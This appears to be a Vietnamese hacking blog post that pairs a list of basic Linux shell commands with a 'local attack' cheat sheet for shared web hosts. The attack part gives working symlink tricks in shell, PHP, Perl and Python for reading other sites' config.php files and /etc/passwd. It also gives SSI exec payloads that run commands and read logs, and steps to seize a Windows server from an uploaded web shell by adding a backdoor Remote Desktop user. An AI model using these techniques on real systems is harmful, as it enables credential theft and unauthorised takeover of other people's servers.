[ LOCAL ] Local Attck

--------------------------------------------------------
- Lệnh hay dùng trên shell, method local, v...v...v... -
--------------------------------------------------------
ls: lấy danh sách tất cả các file và folder trong folder hiện hành.
pwd: xuất đường dẫn của folder làm việc.
cd: thay đổi folder làm việc đến một folder mới.
mkdir: tạo folder mới. | mkdir MonKira | Tạo Thư Mục MonKira
rmdir: xoá folder rỗng. | rmdir MonKira | Xóa Thư Mục MonKira
rm -r: xóa thư mục và tất cả tập tin và thư mục con trong thư mục đó | rm -r MonKira | Xóa thưu mục + các file trong thư mục
cp: copy file | cp /home/MonKira/public_html/MonKira.php /home/MonKira/public_html/MonKira002.php |
mv: đổi tên hay di chuyển file, folder.
rm: xóa file. | rm MonKira.php | xóa file MonKira.php
wc: đếm số dòng, số kí tự | wc MonKira.php | #Số dòng   #Số từ   #Số ký tự MonKira.php
touch: tạo file. | touch MonKira.php | Tạo file MonKira.php
cat=less=more: xem nội dung file. | cat MonKira.php | xem nội dung file MonKira.php
vi: khởi động trình soạn thảo văn bản vi.
df: kiểm tra disk space. không gian đĩa
du: xem disk space đã dùng cho một số file nhất định.
tar -cvzpf archive.tgz /home/example/public_html/folder: nén một folder
tar -tzf backup.tar.gz: liệt kê file nén gz.
tar -xvf archive.tar: giải nén một file tar.
unzip MonKira.zip: giải nén MonKira .zip
wget: download file. | wget http://www.google.com/robots.txt |
chown -hR user:user folder/ : Đổi owner cho folder hay file.
tail 100 matbao.log: Xem 100 dòng cuối cùng của file matbao.log.
date: xem ngày, giờ hệ thống.
cal: Hiển thị lịch
info: Hiển thị thông tin và tài liệu trên shell, các tiện ích và chương trình.
grep: grep chuoi tentaptin: tìm kiếm chuỗi trong tập tin
head: | head tentaptin |     Hiển thị 10 dòng đầu tiên của tập tin
tail |tail tentaptin |    Hiển thị 10 dòng cuối cùng của tập tin
mv: Di chuyển hoặc đổi tên tập tin | mv tentaptincu tentaptinmoi | mv MonKira.php MonKira.php |
echo chuoi: Sao chép chuỗi tới màn hình dòng lệnh | echo Checked By: MonKira |
gzip: Nén một tập tin | gzip tentaptin | gzip MonKira.php | gzip /home/MonKira/public_html/MonKira.php |
gunzip : giải nén tệp tin | gunzip tenteptin.gz | gunzip /home/MonKira/public_html/MonKira.gz |
which lenh:      Hiển thị đường dẫn tới lệnh
whereis lenh:      Hiển thị đường tới nơi chứa lệnh
who: Hiển thị các người dùng đã đang nhập
chmod: thay đổi quyền thư mục/tệp tin | chmod 777 MonKira / chmod 777 MonKira.php |
hostname:      Hiển thị tên định danh của hệ thống
clear: làm sạch cửa sổ dòng lệnh
sleep: cho hệ thống ngừng hoạt động trong một khoảng thời gian. | sleep 5 | tính bằng giây
cat /proc/cpuinfo: Tìm chi tiết kỹ thuật của CPU
cat /proc/meminfo: Bộ nhớ và trang đổi thông tin.
uname -r: Xem hạt nhân phiên bản. kernel
gcc -v: Compiler phiên bản nào tôi đã cài đặt.
/sbin/ifconfig: Xem các địa chỉ IP
reboot: khởi động lại hệ thống. phải có quyền root

////////////////////////// Local attack ////////////////////////////////////////

Sử dụng symlink kết hợp với ssi khi bị 403 forbinden:
symbolick : Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php MonKira.ini
Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- Tạo 1 file MonKira.shtml với nội dung như sau:
<!--#include virtual="MonKira.ini"-->
Trong đó file MonKira.ini là file đã được symbolic link trên server.
Bây giờ view source của file MonKira.shtml ta sẽ thấy đc nội dung file MonKira.ini đã symbolic link.
hoặc: <!--#exec cmd="dir /home/victim/public_html/" -->
------------------------------------------------------------------------
Chạy lệnh bằng file .shtml
- Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml
<!--#exec cmd="cat /etc/passwd"-->
- Lệnh xem file logs như sau:
<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->
Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Tư duy Local Nâng cao ( Tạo File symlink )
[+] Tạo symlink qua run command 
Khi không thể run command bằng PHP shell ta run command bằng perl , python shell
ln -s /home/user/public_html/forum/includes/config.php 1.txt
[+] Tạo file symlink bằng hàm của PHP
<?php
$target = '/home/user_target/public_html/forum/includes/config.php';
$link = '/home/user/public_html/1.txt';
symlink($target, $link);
?>
[+] Tạo File symlink nhờ perl , python
#!/usr/bin/perl -w
symlink('/etc/passwd','/root/Desktop/sym.txt');

#!/usr/bin/python
print "Content-type: text/html\n\n"
import os
filename = "1.txt"
linkto = "/etc/passwd"
os.symlink(linkto, filename)

[+] Thông qua bug
http://pastebin.com/DghFwrEP

[+] Indirect Symlink
Cơ sở là tạo 1 file symlink ở 1 nơi có thể tạo được rồi nén lại
Upload lên nơi cần symlink rồi giải nén
ln -s / r00t -> Tạo File symlink với thư mục /
tar czvf r00t.tar.gz r00t -> Nén file r00t thành r00t.tar.gz
Giải nén 
tar xzf r00t.tar.gz
>>>>>>>>>>>>>> WinDows
______________________________________________
| Chiếm quyền Dedicated Windows Server (VPS) |
| (Chiếm VPS Từ Shell)        |
----------------------------------------------
[Các bước thực hiện]
{1} Trước tiên các bạn cần phải có 1 con Shell trên server có khả năng sử dụng command line (Ở đây các bạn có thể khai thác các lỗ hổng của website để up shell).

{2} Cần phải có full quyền Administrator/Root cho user. Nếu tài khoản user trên server đang sử dụng không có full 
quyền thì bạn có thể dùng exploit shellcode để khai thác nâng quyền.

{3} Sau khi có shell trên server, các bạn có thể cài backdoor hoặc sử dụng ngay chức năng run CMD trên shell của bạn.

{4} Tạo 1 user mới trên server bằng lệnh. Trong đó MonKira là User và MonKira@001 là mật khẩu: 
net user MonKira MonKira@001 /ADD

{5} Set quyền remote desktop cho user MonKira bằng lệnh:
net localgroup "Remote Desktop Users" MonKira /ADD

{6} Nếu thành công thì bạn sẽ nhận được kết quả trả về như sau:
The command completed successfully.
{7} Sử dụng chức năng Remote Desktop của Windows để kết nối và điều khiển server !
-----------------------------------------------------------------------------------------
[ LOCAL ] Local Attck Reviewed by Nguyen Nam Hong on 10:07 AM Rating: 5
Copyright © Kid1412 Blog's 💖 2016
Development by Hong Nguyen Nam
Powered by Blogger.